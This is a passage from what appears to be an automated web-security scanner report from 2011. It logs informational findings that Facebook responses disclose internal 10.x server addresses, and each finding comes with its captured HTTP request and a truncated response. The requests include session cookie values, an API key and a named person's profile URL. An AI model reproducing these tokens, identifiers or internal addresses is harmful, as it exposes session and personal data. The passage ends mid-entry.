xd_proxy.php%3Fversion%3D3%23cb%3Df3d8ca87b8%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14a7778dc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c0a6224%26origin%3Dhttp%253A%252F%252Fwww.cnn.com%252Ff163390b7c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df14a7778dc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.192.38
X-Cnection: close
Date: Mon, 15 Aug 2011 18:45:13 GMT
Content-Length: 235

<script type="text/javascript">
parent.postMessage("cb=f3d8ca87b8&origin=http\u00253A\u00252F\u00252Fwww.cnn.com\u00252Ff163390b7c&relation=parent&transport=postmessage&frame=f14a7778dc", "http:\/\/ww
...[SNIP]...

16.62. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=64b385429f05b2492d713f343d05ba02&app_id=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3147e5618%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39ea840d%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df432c465c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2789e3804%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df432c465c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35de0692%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df432c465c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe5b8538%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff3d8dc2804%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df432c465c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.4.33
X-Cnection: close
Date: Mon, 15 Aug 2011 18:46:39 GMT
Content-Length: 237

<script type="text/javascript">
parent.postMessage("cb=f35de0692&origin=http\u00253A\u00252F\u00252Fmoney.cnn.com\u00252Ff3d8dc2804&relation=parent&transport=postmessage&frame=f432c465c", "http:\/\/mo
...[SNIP]...

16.63. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=64b385429f05b2492d713f343d05ba02&app_id=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3170d7f9c%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3356e2468%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cffa8c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a9b223d8%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cffa8c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cda58208%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cffa8c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2886715c8%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cffa8c4&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.210.43
X-Cnection: close
Date: Mon, 15 Aug 2011 18:46:06 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f1cda58208&origin=http\u00253A\u00252F\u00252Fmoney.cnn.com\u00252Ff32566fe0c&relation=parent&transport=postmessage&frame=f5cffa8c4", "http:\/\/m
...[SNIP]...

16.64. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home.php? HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.173.33
X-Cnection: close
Date: Mon, 15 Aug 2011 18:48:17 GMT
Content-Length: 0


16.65. http://www.facebook.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /home.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home.php? HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/login.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=yxUAz; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.52.34
X-Cnection: close
Date: Mon, 15 Aug 2011 18:24:15 GMT
Content-Length: 0


16.66. http://www.facebook.com/images/loaders/indicator_black.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/loaders/indicator_black.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_black.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433582687%2F1; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Wed, 14 Sep 2011 18:38:49 GMT
X-FB-Server: 10.64.242.30
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:49 GMT
Content-Length: 1996

GIF89a . ................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/
...[SNIP]...

16.67. http://www.facebook.com/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /images/spacer.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/spacer.gif HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433582687%2F1; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/gif
Expires: Wed, 14 Sep 2011 18:38:49 GMT
X-FB-Server: 10.64.249.33
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:49 GMT
Content-Length: 43

GIF89a......./alok.!.......,...........D..;

16.68. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://ia.media-imdb.com/images/M/MV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg@@._V1_.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; datr=pG8pTrLcOF5vWXJLyEMRGq7p; lsd=yxUAz; next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; next_path=%2Fhome.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=pG8pTrLcOF5vWXJLyEMRGq7p; expires=Wed, 14-Aug-2013 18:26:50 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.228.27
X-Cnection: close
Date: Mon, 15 Aug 2011 18:26:50 GMT
Content-Length: 17097

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/login.php";window._EagleEyeSeed="27lC";</script><noscript
...[SNIP]...

16.69. http://www.facebook.com/media/set/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /media/set/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /media/set/?set=a.206519616063696.51681.146642365384755 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ConanTheBarbarian?sk=photos
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FConanTheBarbarian%3Fsk%3Dphotos; wd=1123x954; x-src=%2Fmedia%2Fset%2F%7Cpagelet_photo_albums; act=1313433588181%2F1; _e_mTli_0=%5B%22mTli%22%2C1313433588184%2C%22act%22%2C1313433588181%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755%22%2C%22click%22%2C%22click%22%2C%22photo_albums%22%2C%22r%22%2C%22%2F%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C328%2C584%2C63%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: rdir=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.206519616063696.51681.146642365384755; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: x-src=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.237.31
X-Cnection: close
Date: Mon, 15 Aug 2011 18:38:52 GMT
Content-Length: 172809

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/media\/set\/index.php";window._EagleEyeSeed="QNCv";</scri
...[SNIP]...

16.70. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnnmoney&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.210.43
X-Cnection: close
Date: Mon, 15 Aug 2011 18:45:36 GMT
Content-Length: 4150

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.71. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=64b385429f05b2492d713f343d05ba02&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26c3945bc%26origin%3Dhttp%253A%252F%252Fmoney.cnn.com%252Ff32566fe0c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm&layout=standard&locale=en_US&node_type=link&ref=fbLike&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dstowetoday.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.stowetoday.com%252Fstowe_reporter%252Fnews%252Flocal_news%252Farticle_0a3aa2c8-b923-11e0-b623-001cc4c03286.html%26extra_2%3DUS; lsd=yxUAz; datr=pG8pTrLcOF5vWXJLyEMRGq7p; reg_ext_ref=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMjAyMzczODYxNV5BMl5Bc3dmXkFtZTcwMTM1ODkxNg%40%40._V1_.swf; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; act=1313433616787%2F1; reg_fb_ref=http%3A%2F%2Fpt-br.facebook.com%2Fpeople%2FAndr%25C3%25A9-Azevedo%2F1668500662; wd=1123x918

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.194.65
X-Cnection: close
Date: Mon, 15 Aug 2011 18:46:06 GMT
Content-Length: 7777

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title>
<link type="text/css" rel="stylesheet" href="http
...[SNIP]...

16.72. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

